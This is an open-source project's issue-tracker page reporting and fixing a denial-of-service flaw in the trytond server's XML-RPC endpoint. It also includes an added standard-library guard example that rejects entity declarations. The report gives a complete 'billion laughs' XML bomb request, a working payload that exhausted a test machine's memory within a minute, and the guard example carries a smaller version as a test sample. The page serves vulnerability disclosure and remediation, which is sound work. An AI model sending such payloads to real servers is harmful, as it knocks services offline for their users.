Created on 2022-02-11.13:03:34 by jeremy.mousset, last changed 5 months ago by roundup-bot.
New changeset 69e8f18f5682 by Cédric Krier in branch 'default': Protect against XML vulnerabilities https://hg.tryton.org/tryton-env/rev/69e8f18f5682
New changeset a64ca55b86e3 by Cédric Krier in branch 'default': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/a64ca55b86e3
New changeset 2ef295408a0b by Cédric Krier in branch '6.2': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/2ef295408a0b
New changeset b8e700d01652 by Cédric Krier in branch '6.0': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/b8e700d01652
New changeset d0744bba5682 by Cédric Krier in branch '5.0': Protect against XML vulnerabilities https://hg.tryton.org/trytond/rev/d0744bba5682
New changeset f801a89c84e7 by Cédric Krier in branch 'default': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/f801a89c84e7
New changeset e4019b6ca238 by Cédric Krier in branch '6.2': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/e4019b6ca238
New changeset 973635df5e61 by Cédric Krier in branch '6.0': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/973635df5e61
New changeset 85eb95f609cf by Cédric Krier in branch '5.0': Protect against XML vulnerabilities https://hg.tryton.org/proteus/rev/85eb95f609cf
I propose March 1st to make the security release (with the existing bugfixes) and March 2nd to make the announcement.
I have pyexpat.EXPAT_VERSION : 'expat_2.2.8'
Indeed the Debian version with which we build the Tryton Docker images does not yet have a fixed expat. So it still makes sense to apply defusedxml in trytond and proteus.
I do not think we need to do it for tryton, because the Windows and macOS builds use fixed expat libraries, and also we only parse XML from the user or the server (which are controlled).
Indeed, normally the stdlib should not be vulnerable to billion laughs if used with expat >= 2.4.1. Which version (pyexpat.EXPAT_VERSION) do you have?
For me it is similar to issue11219 and should be fixed together.
Indeed we should apply the monkey patch on trytond, which uses xmlrpc.client to parse XML-RPC requests, and on proteus, which can be used as an xmlrpc client.
Tested against trytond 6.2 with Python 3.8.10
A non-authenticated user can saturate the trytond server's memory and CPU usage with a single xmlrpc request, using the billion laughs attack or other similar "xml bomb" attacks.
Request example [do not test it against a production server of course :)]:
url: http://example.trytond.com/
method: POST
headers:
Content-Type: text/xml
body:
<?xml version='1.0'?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<methodCall>
<methodName>&lol9;</methodName>
<params>
</params>
</methodCall>
When the trytond server receives the request, its RAM usage quickly skyrockets, and the CPU also becomes very busy.
When testing the request on my machine, the 16 GB of RAM and 1 GB of swap were full in under a minute.
defusedxml has a monkey patch for this.
If we use this monkey patch by adding the following to trytond/protocols/xmlrpc.py:
from defusedxml.xmlrpc import monkey_patch
monkey_patch()
then the server will respond to the same request with:
"400 Bad Request: Unable to read XML request".
(because the monkey patch forbids it)
So, it does look like a simple protection against this attack and similar "xml bomb" attacks.
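The following is an added example written for this page; it is not code from the report, from trytond, or from defusedxml. Using only the standard library, it shows the kind of guard that defusedxml.xmlrpc.monkey_patch() installs: an xmlrpc.client.ExpatParser subclass whose expat handlers abort at the first entity declaration, before any expansion takes place, plus a helper for the expat >= 2.4.1 threshold discussed above, checked via pyexpat.version_info. The class and function names (GuardedExpatParser, safe_loads, parse_or_reject), the 1 MiB size cap, the defaults (forbid_dtd off, entity declarations rejected, which is my understanding of defusedxml's defaults) and the two sample requests are assumptions constructed for the illustration; the bomb is cut to three levels so it stays harmless even if a reader removes the guard.

```python
import pyexpat
import xmlrpc.client


class ForbiddenXML(ValueError):
    """Raised for XML features an RPC endpoint never legitimately needs."""


class GuardedExpatParser(xmlrpc.client.ExpatParser):
    """xmlrpc.client.ExpatParser whose DTD handlers abort the parse.

    expat stores entity declarations while reading the DOCTYPE internal subset
    and only expands them when an entity is *referenced* in content, so raising
    from EntityDeclHandler stops a billion-laughs payload before a single
    expansion is performed.  (Illustrative name; mirrors defusedxml's approach.)
    """

    def __init__(self, target, forbid_dtd=False, forbid_entities=True):
        super().__init__(target)
        parser = self._parser  # pyexpat parser created by the base class
        if forbid_dtd:
            parser.StartDoctypeDeclHandler = self._reject_dtd
        if forbid_entities:
            parser.EntityDeclHandler = self._reject_entity
        # Never resolve external entities (local file read / SSRF), whatever the flags.
        parser.ExternalEntityRefHandler = self._reject_external

    @staticmethod
    def _reject_dtd(name, sysid, pubid, has_internal_subset):
        raise ForbiddenXML("DOCTYPE %r forbidden" % name)

    @staticmethod
    def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise ForbiddenXML("entity declaration %r forbidden" % name)

    @staticmethod
    def _reject_external(context, base, sysid, pubid):
        raise ForbiddenXML("external entity %r forbidden" % sysid)


def safe_loads(data, max_bytes=1 << 20, forbid_dtd=False, **unmarshaller_kw):
    """Drop-in for xmlrpc.client.loads(): returns (params, methodname).

    max_bytes is a blunt size cap applied before parsing (defusedxml keeps a
    similar limit); 1 MiB is an assumed value chosen for this example.
    """
    if len(data) > max_bytes:
        raise ForbiddenXML("request body of %d bytes exceeds %d byte limit"
                           % (len(data), max_bytes))
    target = xmlrpc.client.Unmarshaller(**unmarshaller_kw)
    parser = GuardedExpatParser(target, forbid_dtd=forbid_dtd)
    parser.feed(data)   # raises ForbiddenXML at the first forbidden declaration
    parser.close()
    return target.close(), target.getmethodname()


def parse_or_reject(data, **kw):
    """('accepted', (params, methodname)) or ('rejected', reason)."""
    try:
        return "accepted", safe_loads(data, **kw)
    except ForbiddenXML as exc:
        return "rejected", str(exc)


def expat_limits_entity_amplification():
    """True when the linked expat is >= 2.4.1, the release that added expat's
    own amplification limit; below that, stdlib XML-RPC parsing is unprotected."""
    return pyexpat.version_info >= (2, 4, 1)


# Constructed sample requests: same shape as the report's payload, cut to three levels.
BILLION_LAUGHS = b"""<?xml version='1.0'?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
]>
<methodCall><methodName>&lol3;</methodName><params></params></methodCall>"""

BENIGN_REQUEST = b"""<?xml version='1.0'?>
<methodCall>
<methodName>common.version</methodName>
<params><param><value><string>6.2</string></value></param></params>
</methodCall>"""

if __name__ == "__main__":
    print("expat %s, built-in amplification limit: %s"
          % (pyexpat.EXPAT_VERSION, expat_limits_entity_amplification()))
    print(parse_or_reject(BENIGN_REQUEST))
    print(parse_or_reject(BILLION_LAUGHS))
    print(parse_or_reject(BILLION_LAUGHS, forbid_dtd=True))
```

Because expat expands an entity only where it is referenced, raising from EntityDeclHandler costs a few hundred bytes of parsing and no memory, which is the property that turns the minute-to-exhaustion request above into an immediate 400. On an expat older than 2.4.1 this guard (or defusedxml's) is the only thing between an unauthenticated request and the server's memory; on 2.4.1 and later it is still cheaper than relying on expat's amplification heuristic alone. Turn forbid_dtd on when the endpoint never needs a DOCTYPE at all.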
History

Date | User | Action | Args
---|---|---|---
2022-03-01 19:58:29 | roundup-bot | set | messages: + msg74388
2022-03-01 19:57:57 | roundup-bot | set | messages: + msg74386
2022-03-01 19:57:13 | roundup-bot | set | messages: + msg74384; status: testing -> resolved
2022-02-22 22:54:49 | ced | set | messages: + msg74306
2022-02-14 10:38:45 | jeremy.mousset | set | messages: + msg74099
2022-02-12 17:30:29 | ced | set | messages: + msg74062
2022-02-12 15:14:42 | ced | set | messages: + msg74055
2022-02-11 13:29:15 | ced | set | assignedto: ced; component: + trytond, proteus; keyword: + review; messages: + msg74017; reviews: 381941002; status: unread -> testing
2022-02-11 13:12:55 | jeremy.mousset | set | title: A non authenticated use can cause a denial of service with a single request using an xml bomb attack on xmlrpc -> A non authenticated user can cause a denial of service with a single request using an xml bomb attack on xmlrpc
2022-02-11 13:03:34 | jeremy.mousset | create |